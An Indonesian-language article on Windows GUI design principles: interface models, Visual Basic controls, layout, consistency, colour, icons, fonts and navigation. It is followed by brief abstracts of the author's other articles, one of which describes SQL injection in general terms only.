1. Single Document Interface (SDI), Sebuah contoh antar muka SDI adalah aplikasi WordPad yang include di windows. Di dalam WordPad, hanya satu dokumen yang dapat di buka dalam waktu yang sama, dokumen harus ditutup sebelum dokumen lain di buka. Kita tidak bisa bekerja pada dua dokumen yang berbeda dalam waktu yang sama.

Model Single Document Interface

2. Multiple-Document Interface (MDI), sebagi contoh adalah aplikasi  Microsoft Word 2000 and Microsoft Excel 2000. Perangkat lunak tersebut membolehkan membuka, dan menampilkan  banyak dokumen dalam waktu yang sama, tiap dokumen ditampilkan dalam masing-masing window. Untuk berpindah antar dokumen bias menggunakan menu dan sub menu yang ada.

Gambar Model Antar Muka Multiple-Document Interface (MDI)

3. Explorer-Style Interface, Dalam bentuk ini terdapat satu window yang berisi dua panel atau daerah, biasanya konsisten ada tampilan tiga hierarchi di kiri tampilan dan di kanan, seperti Microsoft Windows Explorer.

Model Antar Muka Explorer-Style interface

4. Report Interface. Informasi laporan dapat ditampilkan dalam banyak tipe grafik, row and colom, atau format tek, atau kombinasinya. Banyak aplikasi membolehkan user menampilkan laporan atau mengirim laporan tersebut ke printer untuk keluaran hard-copy.

Model Antar Muka Explorer-Style interface

Dalam menentukan model antar muka yang mana yang terbaik, tim pengembang software (sotfware developer) perlu melihat tujuanan pembuatan program aplikasi tersebut. Membuat aplikasi jam yang simple model SDI adalah yang terbaik, karena sepertinya tidak ada seseorang yang membuka jam lebih dari satu. Aplikasi asuransi yang model MDI adalah yang terbaik karena akan bekerja pada satu atau lebih pada klien secara bersamaan. Model Windows Explorer akan berguna dalam berbagai macam aplikasi baru, karena dapat menampilkan berbagai macam dokumen, gambar atau file. Model laporan (report) menampilkan format yang permanen untuk menampilkan laporan dan tidak memerlukan interaksi user yang banyak.

Tampilan dialog pesan konfirmasi penyimpanan

Mekanisme Kontrol Dialog Box
Hampir semua aplikasi memerlukan komunikasi dengan user. Dalam basis windows, dialog box menyuruh user memilih aksi, dan akan melanjutkan aplikasi. Dialog Box adalah salah satu bentuk form yang spesial untuk menampilkan informasi kepada user dan biasanya memerlukan interaksi user untuk melanjutkan aplikasi.
Aplikasi juga harus menampilkan pilihan pada pengguna, dari bentuk Yes/No sampai ke pilihan yang berisi banyak pilihan. Salah satunya seperti gambar dibawah.

Pemilihan komponen yang berlebihan akan membuat deesain kita kurang bagus, pemilihan komponen yang sesaui dengan kebutuhan dan menggunakannya seperti fungsinya akan membuat desain kita lebih berguna. Berikut beberapa macam kontrol.

Tampilan standar komponen (kontrol) pada Visual Basic.

Adapun fungsi dan nama masing-masing konponen bisa dilihat pada tabel berikut.

Tabel toolbox dan fungsinya.

Nama	Symbol	Keterangan Fungsi
Label		Hanya menampilkan teks. Dalam aplikasi lingkungan windows bersimbol tanda huruf “A”
TextBox		Teks dapat di edit oleh user. Text Box menampilkan infomasi yang dapat dirubah oleh user. Biasanya text Box digunakan untuk menginputkan data yang akan di rekam datanya.
Command Button		Tampilan khas dari Command Button adalah berupa tombol segi empat. Ketika tombol dipilih maka akan mengeksekusi perintah-printah yang ada didalamnya.
Check Box		Salah satu bentuk pilihan yang kecil dimana user dapat memilih lebih dari satu pilihan. Yang menandakan pilihan terhadap suatu kondisi yaitu on or off, true or false, yes or no. Ketika di tampilkan dalam sebuah group, Check Box akan bekerja sendiri secara independen. Pengguna dapat memilih beberapa pilihan dalam satu waktu.
Option Button		Option Button berbentuk pilihan option dimana pengguna hanya di perbolehkan memilih satu. Option Button harus bekerja pada bagian grup, jika kita memilih salah satu option maka yang lainnya akan bersih dari pilihan.
List Box		Bebentuk list yang dapat di pilih dan di scroll. Khasnya, daftar list yang di pilih akan di tamilka pada tampilan vertical dikolom tunggal, meskipun semua list pilihan dapat diguakan semua. Jika yang terpilih melewati jumlah yang di tampilkan maka akan kelua scroll bar. Untuk melihat isi dari pilihan semua kita juga bisa menggunakan drop down. Kita juga bisa memilih lebih dari satu pilihan dengan menggunakan tombol Control yang menandakan pilihan lebih dari satu.
Combo Box		A scrollable list of choices along with a text edit field. Iden- tical to a list box, except the user can either type information in the text box or choose the item from the list. Pilihan yang berbentuk scroll yang dapat diedit. Penggguna dapat memilih yang sudah disediakan dan mengisikan data baru jika belum ada, tetapi identitas index tetap memakai data yang lama.
Slider Control		Bebentuk range yang mengindikasikan posisi ukuran. Control ini biasnya digunakan untuk input kontrol volume atau pengaturan warna pada gambar.
Progress Editor		Menampilkan prosentase suatu proses. Kontrol ini berguna untuk indicator suatu performa program aplikasi. Selain prosentase proses juga bisa digunakan untuk menampilkan berapa waktu sebuah poses akan selesai.

Ketika kontrol-kontrol tersebut dipakai bisanya pemakai menyukai setting default.

Komposisi
Peletakan Kontrol
Dalam desain antar muka, tidak semua elemen (komponen) digunakan. Pengembang perangkat lunak harus tahu mana yang harus digunakan dan dapat dimengerti oleh user dengan cepat. Tidak semua elemen harus ditampilkan dengan jelas, bahkan ada beberapa elemen yang harus di sembunyikan.
Sejumlah bahasa membcaa dari kiri ke kanan atau dari atas ke bawah pada sebuah halaman. Itu sama dengan tampilan pada layar komputer. Mata pemakai mengarah dimulai dari kiri atas dari posisi layar, jadi elemen yag penting bisa diletakkan di sana. Sebagai contoh, jika informasi ada sebuah informasi berhubungan dengan seorang pelanggan, maka namanya akan ditampilkan dimana ia akan dilihat pertama. Tombol, seperti OK atau Next akan ditempatkan di sebelah kanan bawah pada layar, sebab pemakai yang normal tidak akan membutuhkan tombol ini sampai mereka mengakhiri pekerjaannya dengan form tersebut.
Penggabungan elemen dan kontrol juga penting. Informasi harus dikelompokkan selama mereka masih berhubungan. Sebagai contoh, karena fungsi mereka terhubung, tombol untuk menunjukkan sebuah database akan di kelompokkan bersama tampilannya. Itu lebih baik dari pada tersebar seluruhnya pada form.  Informasi nama, alamat biasanya dikelompokkan bersama. Dalam hal lain relasi antar kontrol bisa direlasikan dengan frame.
Secara default, jika akan memindah dari kontrol area yang satu dengan yang lain memakai tombol TAB. Tapi pengguna juga sering menggunakan tombol Enter untuk pindah antar area. Kebutuhan semacam ini harus dapat di akomodir oleh pengembang perangkat lunak.

Konsistensi Desain Antar Muka
Konsistensi adalah hal yang terbaik dalam mendesain antar muka, konsistensi membuat pogram terlihat hamonis dalam suatu program aplikasi. Ketidak konsistenan membuat antar muka menjadi membingungkan dan membuat aplikasi kacau, tak terorganisir, murah dan mungkin menyebabkan user menyangsikan kepercayaan pada aplikasi tersebut.
Untuk konsistensi secara visual, pengembang software harus menyusun strategi bentuk sebelumnya dalam suatu program aplikasi. Desain tiap element, seperti control, standar ukuran dan kelompok kontrol, pemilihan jenis huruf (font) harus direncanakan terlebih dulu. Prototipe jalannya program sangat membantu memutuskan desain yang dipakai, konsistensi, sehinga pengembang tidak bingung.

1. Tipe Kontrol, karena banyaknya macam kontrol yang bisa kita pakai dalam mendesain program aplikasi saat ini, dan semua sudah disediakan dalam tool bahasa pemrograman.
2. Setting Properti, konsistensi pada setting kontrol juga sangat penting. Sebagai contoh, jika kita membuat background dengan warna putih, maka lainnya harus meyesuaikan juga.
3. Tipe Form, konsistensi antar form suatu program aplikasi sangat penting digunakan. Akan tidak terhubung jika kita mengunakan background efek dua dimensi, sedangkan form lainnya memakai efek tiga dimensi.

Penekanan Pada Kontrrol Tertentu
Penekanan pada komponen visual tentang fungsi dari kontrol. Penekanan pada semua kontrol seperti tombol yang dibuat dengan warna menyala akan mengurangi keindahan sebuah desain antar muka. Tapi sebuah keharusan untuk memberikan penekanan tertentu pada suatu kontrol. Misalnya, efek tiga dimensi pada sebuah tombol menunjukkan penguna bahwa itu dapat ditekan. Jika tombol dibuat datar, maka terkesan tidak bisa diklik, tapi dalam aplikasi tertentu tepat jika kita menggunakan tombol datar, seperti dalam aplikasi yang berbasis multimedia. Contoh lain adalah kontrol text box. Text Box biasaya terdiri dari border dan latar belakang putih yang akan berisi tek yang dapat diedit.
Penggunaan Spasi dalam kontrol tertentu juga dapat menekankan pada sebuah elemen. Konsistensi spasi dan perataan (Aligment) akan membuat aplikasi lebih berguna. Sebagai perbandingan kita akan merasa enak membaca majalah dengan terbagi atas beberapa kolom dan dipisahkan dengan spasi akan mudah untuk dibaca seperti halnya pada desain sebuah aplikasi.

Menyederhanakan Desain
Mugkin yang paling penting dalam desain adalah kesederhaan desain. Jika antar muka sebuah aplikasi terihat susah, aplikasi itu juga mungkin akan sulit untuk digunakan. Point yang penting dalam kesederhanaan adalah mudah, enak dilihat dan bersih.
Jika sudah tersedia dalam bentuk form hard copy lebih baik kita meniru bentuk dedsain tersebut dalam desain antar muka kita. Tapi nantinya masih ada permasaahan lain, misalnya: bedanya dimensi antar form komputer dengan kertas, keterbatasan (panjang) form dalam konputer. Permasalahn diatas dapat di kurangi dengan:

1. Mengurangi bermacam variasi bentuk Shape pada sebuah desain form.
2. Mengurangi perbedaaan desain antar form yang satu dengan yang lain.
3. Ingat bahwa pengguna aplikasi bukan kita, buat desain se-familiar mungkin

Pendekatan terbaik dalam mendesain sebuah antar muka aplikasi, mungkin meyamakan dengan bentuk asli form yang sudah ada. Usahakan user tidak terlalu banyak menggunakan scrollbar untuk mencapai keinginannya memperoleh sebuah nilai. Hal tersebut bisa menggunakan:

1. List box, spin button dapat mengurangi beban penguna, selain diberi fasilitas untuk menganti nilai  melalui keyboard.
2. Sediakan bentuk default agar penguna bisa menggunakan aplikasi anda dengan setting baru setiap menjalankan aplikasi.
3. Gunakan wizard untuk memudahkan pengguna.

Tes desain anda pada orang lain, jika mereka masih lama dalam memahami desain anda lakukan desain ulang aplkikasi anda.

Warna dan Gambar
Pengunaan warna dalam antar muka kita dapat menambah efect visual, tapi jangan berlebih dalam menggunakannya.  Dengan kemampuan VGA sekarang dapat menampilkan milyaran warna, dan tidak mungkin semuanya digunakan. Warna sama pentingnya dengan dasar desain, akan menimbulkan masalah jika tidak digunakan secara tepat.
Kecocokan warna dan variasi warna antara pengembang dan pengguna mungkin berbeda. Warna dapat membangkitkan emosi, dan warna mempunyai arti tertenu pada suatu kebudayaan. Dan biasanya agar bisa diterima gunakan warna yang lembut, netral, atau yang sudah sering digunakan diperangkat lunak lainnya.
Pemilihan warna mempengaruhi maksud dari pengguna, kadang warna dalam desain mencerminkan keinginan atau kadaan emosi dari pembuat antar muka pada saat itu. Sebagai contoh perpaduan warna merah terang, hijau dan kuning diperuntukkan untuk aplikasi dengan pengguna anak-anak.
Sedikit warna cerah efektif berguna untuk menekankan atau menentukan area yang dianggap penting. Bagaimanapun juga jumlah warna dalam sebuah aplikasi harus dibatasi, pemakaian warna haruslah konsisten. Jika memungkinkan gunakan standart 16 warna, karena jika menggunakan diatas 16 warna sedangkan user memakai setting VGA 16 warna maka warna diatas 16 akan rusak.
Sebagai pertimbangan lain, pertimbangkan user yang buta warna. Banyak orang tidak mampu mmengatakan perbedaan antara kombinasi warna dasar seperti warna dasar merah dan hijau. Untuk orang yang kondisi seperti ini warna merah teks dalam bakground hijau akan tidak terlihat.

Gambar dan Icon
Penggunaan gambar dan icon dalam aplikasi menambah menarik secara visual, tapi berhati-hati dalam mendesain adalah hal yang utama. Gambar dapat menyampaikan informasi yang efisien tanpa harus menuliskan text, tapi beda orang menerjemahkan gambar bisa juga berbeda.
Toolbar dengan icon mengambar macam-macam fungsi yang digunakan sebagai media interaksi dengan pengguna, tapi user dapat membaca fungsi icon dengan melihat gambar icon. Ketika mendesain gunakan standar icon yang sudah biasa dipakai dalam aplikasi. Sebagai contoh orang akan mencetak dokumen mereka berarti dia akan memilih icon yang bergambar printer. Meskipun anda membuat icon yang lebih baik, fungsi dasar pada icon tersebut harus tetap disertakan agar tidak membingungkan pengguna.
Juga sangat penting mempertimbangkan arti sebuah gambar. Misalnya untuk menggambarkan bahasa yang akan dipakai digambarkan bendera Inggris untuk Bahasa Inggris dan Bendera Perancis untuk mengambarkan Bahasa Perancis.
Ketika mendedsain icon atau gambar, buatlah  icon atau gambar sederhana, Jika menggunakan warna yang komplek akan menurunkan keindahan jika di set pada 16 bit. Sebalikny jika kita menggunakan warna 16 bit, maka jika diset lain yang lebih tinggi maka akan lebih baik gambarnya.

Jenis Huruf (Font)
Karena text sering digunakan untuk komunikasi infomasi, pemilihan jenis huruf yang mudah dibaca dalam resolusi yang berbeda dan berbeda tipe tampilan adalah hal penting dalam mendesain antar muka. Jika memungkinkan gunakan font yang simpel. Pemilihan font yang bagus saat ditampilkan di layar belum belum tentu enak dibaca dalam pint out, apalagi jika fontnnya terlalu kecil.
Biasanya, font standar windows seperti Arial, Time New Roman, atau font yang disediakan oleh system. Jika pengembang software mengunakan font yang tidak terdapat pada syetem tempat dia menempatkan aplikasi maka system akan menganti dengan font lain.
Ketika kita mendedsain sebuah aplikasi yang menggunakn adalah orang-orang sedunia. Sangat penting kita mnyelidiki font apa yang disukai dan yang mungkin terdapat pada system mereka. Yang harus deperhatkan juga adalah mempertimbangkan text yang dipakai, gunakan kata-kata yang sudah biasa digunakan. Antar form maupun satu form sangat penting mempertimbangkan konsistensi pemilihan jenis huruf yang akan digunakan. Pada kasus tertentu tidak lebih dari dua jenis huruf dalam dua atau tiga ukuran pada suatu aplikasi.

Bagaimanakan Antar Muka yang Bagus itu ?
Suatu aplikasi harus dirumuskan dulu tujuan pembuatan aplikasi karena suatu progrm aplikasi bisanya digunakan untuk menyelesaikan masalah. Antar muka merupakan proses interaktif.
Yang paling bagus ketika kita akan mendesain sebuah aplikasi adalah melihat referensi aplikasi yang menjadi best-selling. Mereka malakukan reset, usaha, dan mengeluarkan sumber dana yang tidak sedikit untuk membuat aplikasinya berguna. Mereka banyak menggunkan perintah, tollbar, status bar, ToolTips, sentisitive menu, tab dialog box.
Tim yang memilki pegalaman desain selalu melakukan tes kepada user yang berpengalamn maupun yang belum untuk melihat apakah aplikasi mereka mudah untuk digunakan. Minta saran kepada mereka sangat penting untuk merubah desain jika kurang familiar.
Sebagai tambahan, banyak aplikasi menyediakan pilihan untuk mengakomodasi bermacam-macam pengguna. Misalnya Windows Explorer meyediakan pilihan user yag akan mengkopi file dengan menu, keyboard, atau fungsi drag drop. Penyediaan pilihan dalam aplikasi minimal fungsi dapat dilakukan melalui keyboard dan mouse.

Pedoman Antar Muka Berbasis Windows
Yang menjadi keunggulan dari sistem operasi windows adalah sistem menyediakan perintah interface dalam bayak aplikasinya adalah sama. Pengguna dapat belajar dalam satu basis windows yang lainnya akan mudah untuk dipelajari, karena antar mukanya sama.
Menu adalah contoh yang bagus untuk menunjukkan perintar antar muka. Dalam aplikasi berbasis windows memiliki standar bahwa menu File terletak sebelah kiri dari menu bar dan menu help selalu paling kanan, dan menu opsional lainnya seperti Edit Toll diantaranya. Merubah hal yang sudah menjadi stanadar akan mengakibatkan user akan menjadi bingung dan akan menurunkan keunggulan aplikasi tersebut.
Penempatan perintah juga sangat penting. Sebagai contoh, pengguna ingin menggunakan perintah Copy, Cut, Paste on Edit menu. Memindah ke tempat lain akan menyebabkan pengguna bingung.
Satu kunci konsep pendayagunaan dalam percoabaan adalah penemuan. Jika pengguna tidak dapat menemukan keunggulannya. Penguna harus tahu ketika mereka akan menggerjakan sesuatu maka ia harus tau  dengan hanya melihat aplikasi. Contoh mereka harus tahu jika akan membuka form, menetup form dan lain-lain.
Untuk mengetes pengguna, tim meminta penguna menjalankan aplikasi tanpa diberi tahu sebelumnya. Jika mereka dapat menggunakan aplikasi dengan baik tanpa banyak bertanya, berarti apliakasi itu bagus dan sebaliknya jika user tidak tahu maka tim penegmbang harus bekerja keras untuk merevisi programnya.

Navigasi
Hampir semua pengguna komputer sudah familiar dengan sistem menu sebagai navigasi. Pengunaan elemen menu antarmuka sangat penting. Pengembang biasanya menggunakan ,memu standar windows, karena user sudah terbiasa dan familiar menggunakan standar menu windows. Dengan penambahan skrip pada browser. Aplikasi berbasis web dapat memakai sistem menu window seperti sistem menu aplikasi pemrograman klasik.  Sebagai tambahan link form pada aplikasi klasik di dalam web berubah menjadi link antar file. Dan sekali lagi kesederhaan dan konsistensi dalam mendesain sebuah aplikasi adalah poin yang bagus dalm navigasi sistem.

Panduan Untuk Penguna
Bagaimanapun bagusnya sebuah antar muka haus juga dipenuhi panduan untuk pengguna, karena pegguna wewaktu-waktu membutuhkan hal tersebut. Entuk bantuan adalah berupa file help atau file HTML yang desertakan dalam aplikasi dan siap diprint untuk dokumentasi. Bentuk bantuan harus di desain sebelum aplikasi dibuat deploy, seperti bagian lain dari program.

Kesimpulan
Prinsip utama dalam mendesain sebuah program adalah bagaimana kita bisa memilih elemen sesuai fungsinya, memilih kombinasi warna, meletakkan elemen dengan mudah dan navigasi program yang baik. Tes program aplikasi  langsung kepada penguna tanpa harus memberitahu dulu. Jika mereka bisa menemukan bagaimana cara menggunakan program aplikasi anda berarti program anda sudah layak.

Daftar Pustaka

1. Vaughan, William R, 1998, Hitchhikers Guide to Visual Basic and SQL Server Sixth Edition, Microsoft Press, United State of America.
2. Freeze, Wayne, 2000, Visual Basic 6 Database Programming Bible, Microsoft Press, Indinapolis, New York, United State of America.
3. Tim, Microsoft, 1999, Analyzing Requerements and Defining Solution Architectures, Microsoft Press, United State of America.
4. www.microsoft.com (Microsoft Developer Network / MSDN)

Abstraksi:

Ketika mesin server hanya port 80 yang dibuka, kita mempunyai keyakinan bahwa tidak akan menghasilkan sesuatu yang bermanfaat yang dapat digunakan untuk menyerang, admin juga beranggapan hanya degan mem-patch servernya dianggap aman. Jika anggapan itu terus dipakai berarti kita “menekan tombol” untuk membuka hacker masuk.
SQL Injection adalah salah satu tipe meng-hack yang hanya membutuhkan port 80 dan tidak memerlukan port lain. SQL injection akan menyerang aplikasi web yang berbasiskan side-server scripting seperti ASP, JSP, PHP, CGI, dan yang mirip dengan itu. Pada artikel ini kita tidak akan membahas hal yang paling baru tentang SQL Injection, karena motode dan trik SQL Injection terus berkembang.
Sebelum anda membaca lebih lanjut, anda harus mnegetahui terlebih dahulu bagaimana database bekerja dan bagaimana SQL digunakan untuk mengaksesnya.

Kata Kunci: SQL, Injection, Web, PHP, ASP, CGI, Form, Query

Email:
Jika menginginkan lebih lengkap email ke: myandisun@gmail.com

Abstraksi:

Apa yang terjadi jika pada halaman form Anda ada kesalahan pemasukan data atau pengiriman berulang oleh user ke server ? Jika itu adalah masalah Anda maka validasi form adalah jawabannya. Dengan adanya validasi data yang di kirim ke server kita cek dulu kebenarannya.

Kata Kunci: validasi, form, web, klient, server

Email:
Jika menginginkan lebih lengkap email ke: myandisun@gmail.com

Abstraksi:

Desain antar muka yang baik adalah salah satu hal  penting dalam menilai sebuah program aplikasi bagus atau tidak. Sebelum mendesain pilih bentuk antarmuka yang disesuaikan dengan kebutuhan pengguna.  Kesederhaan sebuah, mudah penggunaan adalah inti dari mendesain sebuah antar muka, dan hal itu dapat terwujud jika kita tepat memilih komponen (kontrol), menempatkannya dengan benar, memilih warna yang sesuai, dan membuat navigasi yang mudah.

Kata Kunci:
GUI, antar muka, kontrol, desain, Sederhana, interface, penguna, user, windows, label, text box, list box, option box, form, navigasi, elemen

Email:
Jika menginginkan lebih lengkap email ke: myandisun@gmail.com